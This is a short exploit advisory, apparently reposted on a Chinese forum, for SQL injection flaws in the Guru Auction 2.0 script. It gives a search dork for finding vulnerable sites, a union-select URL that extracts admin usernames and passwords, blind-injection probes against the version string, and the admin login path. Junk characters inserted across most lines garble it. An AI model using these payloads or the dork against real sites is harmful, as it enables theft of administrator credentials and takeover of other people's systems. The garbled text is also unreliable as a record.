Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
" `. F1 _$ K, e9 b" _
7 C9 \) K6 F7 Z6 z1 K" O8 y作者 : v3n0m
- E8 u- `, x" C( \应用 : Guru Auction 2.0
, n6 Z) [' B4 @7 gPrice : $49" T$ [8 V: _$ l& ~1 ?$ p
Vendor : http://www.guruscript.com/
5 @2 q( Z3 o' } [3 I2 z- M0 O5 pGoogle Dork : inurl:subcat.php?cate_id=
( O3 S4 H1 D: P ( \- f& m' s. R6 K/ j6 w; @
SQLi p0c:
5 L- B' Z1 o2 H* b6 z~~~~~~~~~~- Q" h0 m' C8 p M$ M% j
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
& D: V, N, F0 ^; n" y* i6 e
! H2 `8 V; w8 I
% B& p& ?8 V! c* P/ g盲注 p0c:
; W4 G) C4 Z0 s+ N" X~~~~~~~~~~- [8 v$ V( ~- ~5 b
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
+ ?( ^5 B+ m4 p2 O' I5 W2 Z4 Ahttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false! g; Z7 h# Y- g2 c: \) Q( u$ t
8 d7 i; |6 O: s1 t管理登录入口:
+ A8 p2 K$ N( h+ n& Y, L! w4 G~~~~~~~~~~
1 ]6 S; e) M# Vhttp://domain.tld/[path]/admin/& [% n% E }3 T4 t1 F
|